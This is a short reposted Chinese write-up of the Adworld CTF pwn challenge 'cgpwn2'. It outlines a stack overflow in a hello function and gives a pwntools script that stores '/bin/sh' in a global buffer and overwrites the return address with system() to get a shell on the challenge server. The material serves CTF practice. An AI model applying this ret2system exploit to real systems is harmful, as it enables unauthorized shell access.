相关内容简体繁体

攻防世界—pwn—cgpwn2

本文转载自查看原文 2020-04-10 09:29 700 CTF

题目分析

题目提示

checksec检查文件保护机制

使用ida查看伪代码

hello函数存在溢出，与level2类似

信息收集

system地址

name的地址

编写脚本

from pwn import *
p = remote('111.198.29.45',42844)
#p = process("./pwn006")
binsh = "/bin/sh"
system = 0x8048420
name = 0x804A080
payload = "A"*0x26+"B"*0x4+p32(system)+p32(0)+p32(name)
p.sendlineafter("please tell me your name",binsh)
p.sendlineafter("hello,you can leave some message here:",payload)
p.interactive()

本地测试

靶机测试

免责声明！

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 攻防世界 pwn welpwn [攻防世界]pwn1 攻防世界PWN题 string 攻防世界—pwn—level2 攻防世界—pwn—level0 攻防世界-pwn-writeup 攻防世界--hello_pwn 攻防世界pwn-Mary_Morton 攻防世界pwn之新手练习区攻防世界PWN题 level3

粤ICP备18138465号 © 2018-2025 CODEPRJ.COM